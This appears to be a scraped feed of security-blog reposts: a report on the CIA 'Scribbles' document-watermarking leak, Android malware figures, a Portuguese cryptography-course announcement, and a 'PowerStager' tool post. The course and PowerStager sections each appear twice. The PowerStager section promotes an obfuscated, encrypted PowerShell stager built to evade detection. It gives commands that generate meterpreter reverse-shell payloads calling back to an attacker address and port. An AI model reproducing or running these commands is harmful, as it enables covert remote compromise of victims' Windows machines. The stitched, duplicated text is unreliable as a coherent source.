WikiLeaks Exposure CIA Document Tagging Tool

Recently, WikiLeaks released Vault 7 series document details how the CIA (CIA) tracks groups of whistleblowers, journalists, and so on. Use the ” Scibbles ” (also known as Snowden Stopper) software to embed Web signal tags in files that may be leaked so that even if the document is stolen, the CIA can locate the files and collect the relevant information and feed it back to the CIA.

Image from Flickr

The date of this document is dated March 1, 2016, marking the date of authorization until 2066. WikiLeaks expressed: “Scibbles for Microsoft offline pretreatment Office documents for reasons of security operations in the instruction manual required Scribble not install executable on the target device, parameter files, receipts, or log file, it will not. Leaving information that may be collected by the organization. ”

The project document shows that Scribble is basically a watermark tool that can be successfully applied to all Microsoft Office 2013 (in Windows 8.1 x64) and Office 97-2016 version of the document, but does not apply to Office 95 documents.

However, this software also has some problems, limited to the use of Microsoft Office open the document. “If the target end user uses other applications such as OpenOffice or LibreOffice, the user can see the watermark photo and the URL connection, so the CIA always needs to make sure that the host name or URL component matches the source content,” the document says. If the target user you are investigating may use these non – Microsoft Office applications to open these documents, please do some testing and evaluation before deploying.

The post WikiLeaks Exposure CIA Document Tagging Tool helps track leaks appeared first on Penetration Testing in Linux. http://ift.tt/2qj9607 http://ift.tt/2aM8QhC

Anúncios

android malicious program

According to the security company G Date recently released survey data, Android platform has become the hardest hit by cybercrime, only in the first quarter of 2017 found 75 million new Android malware applications, which means that an average of 8400 per day New malware appears. The company expects to have more than 3.5 million new Android malware by the end of this year, compared with 3.25 million malware last year.

But in this report also provides some new changes worthy of recognition, Android devices can scan to detect more and more malicious files, but for Android smart phones and tablet users are still very serious security threats.

The company also pointed out that one of the keys to the problem is that some of the old models can not be upgraded to the latest Android version, in fact, according to Google official information only 4.9% of smart phones and tablet users upgrade Android 7.0 Nougat system, run Android 6.0 Marshmallow Equipment more than 31%, Android 5.0 Lollipop equipment more than 32%. There are 20% of the devices running Android KitKat.

“The problem is that third-party handset manufacturers will not provide the latest operating system updates for older models (the old device is for more than a year), and the vendor-supplied update is often very slow.”

The post An average of 8400 Android malicious programs come out every day appeared first on Penetration Testing in Linux. http://ift.tt/2pvVAU6 http://ift.tt/2aM8QhC

CryptoID ministrará curso avançado de criptografia na UFRJ | CRYPTOID

CryptoID ministrará curso avançado de criptografia na UFRJ Regina Tupinambá

O CryptoId que é o maior portal sobre identificação digital do Brasil ministrará nos dia 5 e 6 de maio o curso ID Plus | Criptografia e Identificação Digital Avançado aos servidores da Diretoria de Segurança da Informação da UFRJ, com a participação de alunos da Universidade e de participantes sorteados na última edição da CAOS.

Este curso é dirigido à profissionais de diversos segmentos de negócios, com conhecimento em tecnologia da informação, que queiram atualizar seus conhecimentos na aplicação da criptografia à autenticação forte, segurança de mensagens, processos eletrônicos, assinatura digital,guarda de documentos eletrônicos, política de assinatura, de normas e padrões brasileiros e internacionais. E a aplicação da criptografia e assinatura digital no Blockchain, Block-Start, Inteligência Artificial e Internet das Coisas.

“O Software vai devorar o mundo” Marc Andreessen!

“O curso ID Plus | Criptografia e Identificação Digital Avançado é ministrado presencialmente e, atualmente, só realizamos este treinamento sob demanda de grandes empresas no modelo”In Company” por se tratar de um curso que requer dos participantes, como pré-requisito, o conhecimento técnico em segurança da informação. Adicionalmente, o espectro do curso é moldado para o segmento dos contratantes. Nossos cursos sobre Criptografia e Identificação Digital apresentam teoria, conceito e casos reais sobre vulnerabilidades e soluções disponibilizadas no mercado para que os alunos possam analisar seu ambiente, projetos e soluções que estão disponíveis no mercado. Ao customizarmos o treinamento, estamos falando que os cases e vulnerabilidades são voltados para o segmento do contratante para que os alunos tirem o maior proveito possível do curso que tem a carga horária de 16 horas (dois dias)”, esclarece Susana Taboas COO do CryptoID.

O curso na UFRJ será ministrado por Sérgio Leal, colunista e membro do conselho editorial do CryptoID.

Sérgio Leal | Criptógrafo, Pesquisador e Colonista do Crypto ID

“A oportunidade do CryptoID ministrar o curso surgiu durante o apoio à CAOS – Conferência Anual Orientada a Segurança organizada pela Diretoria de Segurança da Informação da UFRJ na qual ministrei uma palestra sobre segurança da Informação. A palestra ficou um um gostinho de “quero mais” e como as questões levantadas durante a palestra foram questões de conteúdo técnico, resolvemos realizar a versão do curso avançado e não do básico como havíamos planejado.

Nosso objetivo é capacitar os acadêmicos e profissionais que atuam em segurança da informação a aplicar os conceitos de segurança da informação com uso de criptografia e identificação digital, conhecer as vulnerabilidades em foco no mundo para mitigar os riscos de invasões. Esse curso é importante para os desenvolvedores de soluções e para gestores que estão à frente da contratação de produtos e serviços de consultoria que envolve esse universo”, declara Sergio Leal.

Segundo Vinicius S. P. Fernandes | Diretor de Segurança da Informação – DSI/UFRJ | Diretoria de Segurança da Informação da UFRJ é responsável pela coordenação de resposta a incidentes da UFRJ.

“Nosso foco é atuar no âmbito da universidade com ações preventivas e reativas. Porém, entendemos que cumprimos um papel social importante, enquanto membros da UFRJ, e buscamos investir em ações educativas com escopo além da Universidade.

– Nosso curso de extensão já atinge várias instituições públicas.

– Nossas palestras já foram realizadas para públicos de escolaridades e localidades diversas.

– Além da Conferência Anual Orientada a Segurança (CAOS), que tem entrada franca e palestras com temas técnicos e gerais.

Com as dificuldades inerentes do serviço público, atuar com estas atividades exige uma dedicação extrema de nossos servidores, mas temos barreiras que se mostram complexas para superar. Desde 2016, o CryptoID tem nos apoiado na superação de tais barreiras, ajudando nos eventos realizados pela Diretoria de Segurança da Informação da UFRJ. Seu apoio foi vital para a realização da CAOS.

Hoje, temos mais um apoio para agradecer: O treinamento em Certificação Digital realizado pelo CryptoID aos servidores da Diretoria de Segurança da Informação da UFRJ, com a participação de alunos da Universidade e de participantes sorteados na última edição da CAOS.

Ações como estas nos anima a seguir com nossas atividades no caminho de uma Internet mais segura, permitem complementar a formação de nossos alunos e atualizar a formação dos nossos servidores”, finaliza Vinicius S. P. Fernandes.

Saiba mais sobre a CAOS em http://www.caos.ufrj.br

Conheça o ID PLus | Certificação Digital

Se você ficou interessado em participar dos nossos treinamentos, contratar turmas in company ou customizar um workshop compacto com a marca da sua empresa fale com a gente. idplus@cryptoid.com.br | 11 3881-0053

O post CryptoID ministrará curso avançado de criptografia na UFRJ apareceu primeiro em CRYPTOID. http://ift.tt/2oYD2uB http://ift.tt/2aM8QhC

CryptoID ministrará curso avançado de criptografia na UFRJ | CRYPTOID

CryptoID ministrará curso avançado de criptografia na UFRJ Regina Tupinambá

O CryptoId que é o maior portal sobre identificação digital do Brasil ministrará nos dia 5 e 6 de maio o curso ID Plus | Criptografia e Identificação Digital Avançado aos servidores da Diretoria de Segurança da Informação da UFRJ, com a participação de alunos da Universidade e de participantes sorteados na última edição da CAOS.

Este curso é dirigido à profissionais de diversos segmentos de negócios, com conhecimento em tecnologia da informação, que queiram atualizar seus conhecimentos na aplicação da criptografia à autenticação forte, segurança de mensagens, processos eletrônicos, assinatura digital,guarda de documentos eletrônicos, política de assinatura, de normas e padrões brasileiros e internacionais. E a aplicação da criptografia e assinatura digital no Blockchain, Block-Start, Inteligência Artificial e Internet das Coisas.

“O Software vai devorar o mundo” Marc Andreessen!

“O curso ID Plus | Criptografia e Identificação Digital Avançado é ministrado presencialmente e, atualmente, só realizamos este treinamento sob demanda de grandes empresas no modelo”In Company” por se tratar de um curso que requer dos participantes, como pré-requisito, o conhecimento técnico em segurança da informação. Adicionalmente, o espectro do curso é moldado para o segmento dos contratantes. Nossos cursos sobre Criptografia e Identificação Digital apresentam teoria, conceito e casos reais sobre vulnerabilidades e soluções disponibilizadas no mercado para que os alunos possam analisar seu ambiente, projetos e soluções que estão disponíveis no mercado. Ao customizarmos o treinamento, estamos falando que os cases e vulnerabilidades são voltados para o segmento do contratante para que os alunos tirem o maior proveito possível do curso que tem a carga horária de 16 horas (dois dias)”, esclarece Susana Taboas COO do CryptoID.

O curso na UFRJ será ministrado por Sérgio Leal, colunista e membro do conselho editorial do CryptoID.

Sérgio Leal | Criptógrafo, Pesquisador e Colonista do Crypto ID

“A oportunidade do CryptoID ministrar o curso surgiu durante o apoio à CAOS – Conferência Anual Orientada a Segurança organizada pela Diretoria de Segurança da Informação da UFRJ na qual ministrei uma palestra sobre segurança da Informação. A palestra ficou um um gostinho de “quero mais” e como as questões levantadas durante a palestra foram questões de conteúdo técnico, resolvemos realizar a versão do curso avançado e não do básico como havíamos planejado.

Nosso objetivo é capacitar os acadêmicos e profissionais que atuam em segurança da informação a aplicar os conceitos de segurança da informação com uso de criptografia e identificação digital, conhecer as vulnerabilidades em foco no mundo para mitigar os riscos de invasões. Esse curso é importante para os desenvolvedores de soluções e para gestores que estão à frente da contratação de produtos e serviços de consultoria que envolve esse universo”, declara Sergio Leal.

Segundo Vinicius S. P. Fernandes | Diretor de Segurança da Informação – DSI/UFRJ | Diretoria de Segurança da Informação da UFRJ é responsável pela coordenação de resposta a incidentes da UFRJ.

“Nosso foco é atuar no âmbito da universidade com ações preventivas e reativas. Porém, entendemos que cumprimos um papel social importante, enquanto membros da UFRJ, e buscamos investir em ações educativas com escopo além da Universidade.

– Nosso curso de extensão já atinge várias instituições públicas.

– Nossas palestras já foram realizadas para públicos de escolaridades e localidades diversas.

– Além da Conferência Anual Orientada a Segurança (CAOS), que tem entrada franca e palestras com temas técnicos e gerais.

Com as dificuldades inerentes do serviço público, atuar com estas atividades exige uma dedicação extrema de nossos servidores, mas temos barreiras que se mostram complexas para superar. Desde 2016, o CryptoID tem nos apoiado na superação de tais barreiras, ajudando nos eventos realizados pela Diretoria de Segurança da Informação da UFRJ. Seu apoio foi vital para a realização da CAOS.

Hoje, temos mais um apoio para agradecer: O treinamento em Certificação Digital realizado pelo CryptoID aos servidores da Diretoria de Segurança da Informação da UFRJ, com a participação de alunos da Universidade e de participantes sorteados na última edição da CAOS.

Ações como estas nos anima a seguir com nossas atividades no caminho de uma Internet mais segura, permitem complementar a formação de nossos alunos e atualizar a formação dos nossos servidores”, finaliza Vinicius S. P. Fernandes.

Saiba mais sobre a CAOS em http://www.caos.ufrj.br

Conheça o ID PLus | Certificação Digital

Se você ficou interessado em participar dos nossos treinamentos, contratar turmas in company ou customizar um workshop compacto com a marca da sua empresa fale com a gente. idplus@cryptoid.com.br | 11 3881-0053

O post CryptoID ministrará curso avançado de criptografia na UFRJ apareceu primeiro em CRYPTOID. http://ift.tt/2oYD2uB http://ift.tt/2aM8QhC

PowerStager – A payload stager using PowerShell

This script creates an executable stager that downloads a selected powershell payload, loads it into memory and executes it using obfuscated EC methods. The script will also encrypt the stager for dynamic signatures and some additional obfuscation.

This enables the actual payload to be executed indirectly without the victim downloading it, only by executing the stager. The attacker can then for example implement evasion techniques on the web server, hosting the payload, instead of in the stager itself.

Additional methods allows the payload to be embedded into the ‘stager’ and temporarily stored encrypted on disk for memory injection.

Not only are powershell powerful when managing Windows, it’s also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherit trust of powershell, interpretation of shorthand syntaxes, code evaluation and more…

How to use
Install it:

git clone http://ift.tt/2qlO1PK powerstagersudo ./setup.py install

Generate a meterpreter payload to upload:

powerstager -t win64 -o out.ps1 -m –lhost 13.37.13.37 –lport 4444 –generatepowerstager -t win64 -o out.exe -u

Generate an embedded meterpreter payload:

powerstager -t win64 -o out.exe -m –lhost 13.37.13.37 –lport 4444

Generate an embedded custom payload:

powerstager -t win64 -o out.exe -p input.ps1

Download PowerStager http://ift.tt/2pxf9NO http://ift.tt/2aM8QhC

PowerStager – A payload stager using PowerShell

This script creates an executable stager that downloads a selected powershell payload, loads it into memory and executes it using obfuscated EC methods. The script will also encrypt the stager for dynamic signatures and some additional obfuscation.

This enables the actual payload to be executed indirectly without the victim downloading it, only by executing the stager. The attacker can then for example implement evasion techniques on the web server, hosting the payload, instead of in the stager itself.

Additional methods allows the payload to be embedded into the ‘stager’ and temporarily stored encrypted on disk for memory injection.

Not only are powershell powerful when managing Windows, it’s also powerful when exploiting Windows. This script exploits multiple Windows features such as its inherit trust of powershell, interpretation of shorthand syntaxes, code evaluation and more…

How to use
Install it:

git clone http://ift.tt/2qlO1PK powerstagersudo ./setup.py install

Generate a meterpreter payload to upload:

powerstager -t win64 -o out.ps1 -m –lhost 13.37.13.37 –lport 4444 –generatepowerstager -t win64 -o out.exe -u

Generate an embedded meterpreter payload:

powerstager -t win64 -o out.exe -m –lhost 13.37.13.37 –lport 4444

Generate an embedded custom payload:

powerstager -t win64 -o out.exe -p input.ps1

Download PowerStager http://ift.tt/2pxf9NO http://ift.tt/2aM8QhC